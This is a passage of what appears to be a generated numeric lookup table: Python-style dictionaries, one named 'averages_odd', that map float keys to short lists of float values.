0.0535714285714, 0.8035714285714], 0.907844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.749681122449: 
[0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.785395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.568558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.682397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.58131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.088966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.841517857143: [0.375, 0.625], 0.430803571429: [0.875, 0.125], 0.024234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.70631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.037946428571: [0.875, 0.125], 0.632653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.218112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.086734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.349170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.88137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.392538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.570153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.777742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.95631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.532844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.323660714286: [0.875, 0.125], 0.499681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.316326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.544642857143: [0.75, 0.25], 0.622130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.586415816327: [0.9464285714286, 0.1964285714286, 
0.0535714285714, 0.8035714285714], 0.673469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.274234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.427295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.637755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.102040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.758928571429: [0.75, 0.25], 0.267538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.555803571429: [0.375, 0.625], 0.211415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.714285714286: [0.5, 0.0], 0.459183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.889987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.448660714286: [0.375, 0.625], 0.571109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.667091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.94387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.432397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.571428571429: [0.5, 0.0], 0.214285714286: [0.5, 0.0], 0.42825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.280612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.693558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.646683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.248724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.234375: [0.375, 0.625], 0.836415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.25: [0.5, 0.0], 0.959183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.003826530612: 
[0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.668367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.517538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.301020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429]}
averages_odd={0.0: [0.5, 0.0], 0.109375: [0.875, 0.125], 0.1875: [0.25, 0.75], 0.392857142857: [0.5, 0.0], 0.127232142857: [0.375, 0.625], 0.188456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.209183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.744897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.856823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.5: [0.5, 0.0], 0.946109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.657844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.03443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.244897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.354272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.535714285714: [0.5, 0.0], 0.473214285714: [0.75, 0.25], 0.78443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.753826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.59693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.537946428571: [0.875, 0.125], 0.813456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.780612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.015306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.488520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.999681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.559948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.382653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.651785714286: [0.75, 0.25], 0.009885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 
0.823660714286: [0.875, 0.125], 0.6875: [0.75, 0.25], 0.412946428571: [0.375, 0.625], 0.882653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.502232142857: [0.875, 0.125], 0.270089285714: [0.375, 0.625], 0.08131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.75: [0.5, 0.0], 0.104272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.973214285714: [0.75, 0.25], 0.443558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.713010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.253826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.887755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.035714285714: [0.5, 0.0], 0.287946428571: [0.875, 0.125], 0.142538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.892857142857: [0.5, 0.0], 0.238520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.345663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.561224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.680803571429: [0.875, 0.125], 0.177295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.988520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.259885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.454081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.45631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.377232142857: [0.375, 0.625], 0.19387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.580357142857: [0.75, 0.25], 0.742028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.032844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 
0.5535714285714], 0.981823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.357142857143: [0.5, 0.0], 0.645089285714: [0.875, 0.125], 0.468112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.425701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.277742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.535395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.258928571429: [0.25, 0.75], 0.086415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.588966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.372448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.938456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.867028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.355867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.366071428571: [0.75, 0.25], 0.294642857143: [0.25, 0.75], 0.713966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.464285714286: [0.5, 0.0], 0.017538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.313456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.738520408163: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.854272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.606823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.675701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.948660714286: [0.375, 0.625], 0.389987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.020089285714: [0.375, 0.625], 0.67825255102: 
[0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.384885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.359375: [0.875, 0.125], 0.265306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.770089285714: [0.375, 0.625], 0.099170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.575255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.289540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.395089285714: [0.875, 0.125], 0.917091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.821428571429: [0.5, 0.0], 0.658163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.927295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.178571428571: [0.5, 0.0], 0.670599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.352040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.311224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.014987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.213010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.729272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.709183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.071109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.229272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.604272959184: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.09693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.821109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.338966836735: [0.0178571428571, 0.2678571428571, 
0.7321428571429, 0.9821428571429], 0.461415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.652742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.723214285714: [0.75, 0.25], 0.231823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.066326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.55325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.275510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.452806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.157844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.989795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.002232142857: [0.875, 0.125], 0.624681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.336734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.489795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.84693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.05325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.63137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.800701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.525510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.420599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.039540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.9375: [0.75, 0.25], 0.678571428571: [0.5, 0.0], 0.080357142857: [0.25, 0.75], 0.151785714286: [0.25, 0.75], 0.866071428571: [0.75, 0.25], 0.80325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.320153061224: [0.0357142857143, 
0.9642857142857, 0.5357142857143, 0.4642857142857], 0.198660714286: [0.375, 0.625], 0.202806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.627232142857: [0.375, 0.625], 0.774234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.479591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.739795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.563456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.891581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.497130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.545599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.162946428571: [0.375, 0.625], 0.908163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.711415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.050701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.896683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.860969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.902742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.765306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.282844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.463966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.356823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.360969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.702806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.794642857143: [0.75, 0.25], 0.830357142857: [0.75, 0.25], 0.928571428571: [0.5, 0.0], 0.923469387755: [0.5714285714286, 
0.4285714285714, 0.9285714285714, 0.0714285714286], 0.204081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.918367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.677295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.401785714286: [0.75, 0.25], 0.146683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.025510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.836734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.747130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.38137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.063456632653: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.855867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.418367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.168367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.474170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.239795918367: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.196109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.752232142857: [0.875, 0.125], 0.825255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.789540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.816326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.106823979592: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.075255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.027742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.550701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 
0.8035714285714], 0.17825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.402742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.503826530612: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.508928571429: [0.75, 0.25], 0.92825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.595663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.341517857143: [0.375, 0.625], 0.318558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.213966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.423469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.374681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.809948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.599170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.716517857143: [0.875, 0.125], 0.943558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.035395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.438456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.295599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.994897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.145089285714: [0.875, 0.125], 0.729591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.609375: [0.875, 0.125], 0.229591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.494897959184: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.309948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.857142857143: [0.5, 0.0], 0.4375: [0.75, 0.25], 0.852040816327: [0.5714285714286, 0.4285714285714, 
0.9285714285714, 0.0714285714286], 0.484375: [0.375, 0.625], 0.895089285714: [0.875, 0.125], 0.524234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.158163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.642857142857: [0.5, 0.0], 0.321109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.952806122449: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.285714285714: [0.5, 0.0], 0.408163265306: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.660395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.966517857143: [0.875, 0.125], 0.872448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.070153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.141581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.446109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.998724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.330357142857: [0.75, 0.25], 0.44387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.008928571429: [0.25, 0.75], 0.910395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.968112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.83131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.105867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.963010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.764987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.805803571429: [0.625, 0.375], 0.030612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.305803571429: [0.375, 0.625], 0.134885204082: [0.4107142857143, 0.1607142857143, 
0.5892857142857, 0.8392857142857], 0.731823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.573660714286: [0.875, 0.125], 0.591517857143: [0.375, 0.625], 0.055803571429: [0.375, 0.625], 0.142857142857: [0.5, 0.0], 0.13137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.734375: [0.375, 0.625], 0.28443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.059948979592: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.170599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.872130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.068558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.110969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.718112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.877232142857: [0.375, 0.625], 0.264987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.173469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.336415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.795599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.073660714286: [0.875, 0.125], 0.801020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.704081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.285395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.137755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.30325255102: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.300701530612: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.874681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.095663265306: [0.8928571428571, 
0.3928571428571, 0.6071428571429, 0.1071428571429], 0.061224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.838966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.387755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.044642857143: [0.25, 0.75], 0.180803571429: [0.875, 0.125], 0.901785714286: [0.75, 0.25], 0.696109693878: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.223214285714: [0.75, 0.25], 0.463010204082: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.051020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.20631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.182397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.224170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.193558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.820153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.53443877551: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.107142857143: [0.5, 0.0], 0.992028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.748724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.132653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.954081632653: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.961415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.124681122449: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.247130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.566326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.242028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 
0.8392857142857], 0.167091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.698660714286: [0.375, 0.625], 0.641581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.845663265306: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.69387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.515306122449: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.785714285714: [0.5, 0.0], 0.964285714286: [0.5, 0.0], 0.527742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.639987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.997130102041: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.139987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.116071428571: [0.25, 0.75], 0.071428571429: [0.5, 0.0], 0.634885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.767538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.391581632653: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.642538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.811224489796: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.417091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.920599489796: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.122130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.859375: [0.875, 0.125], 0.932397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.622448979592: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.252232142857: [0.875, 0.125], 0.724170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.787946428571: [0.875, 0.125], 0.782844387755: 
